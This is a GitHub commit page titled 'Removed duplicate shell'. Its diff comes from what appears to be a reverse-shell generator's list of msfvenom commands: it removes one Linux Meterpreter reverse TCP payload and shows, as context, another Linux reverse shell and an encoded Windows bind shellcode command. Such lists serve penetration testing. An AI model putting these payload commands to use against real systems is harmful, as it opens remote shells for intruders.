Removed duplicate shell

This commit is contained in:
Brandon 2021-04-19 10:56:07 +01:00 committed by GitHub
parent 0bb4509882
commit bc352853e2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -280,11 +280,6 @@ const msfvenomCommands = withCommandType(
"command": "msfvenom -p linux/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf",
"meta": ["msfvenom", "linux", "meterpreter", "stageless", "reverse"]
},
{
"name": "Linux Meterpreter Staged Reverse TCP (x64)",
"command": "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf -o shell.elf",
"meta": ["msfvenom", "linux", "meterpreter", "staged", "reverse"]
},
{
"name": "Windows Bind TCP ShellCode - BOF",
"command": "msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python -v notBuf -o shellcode",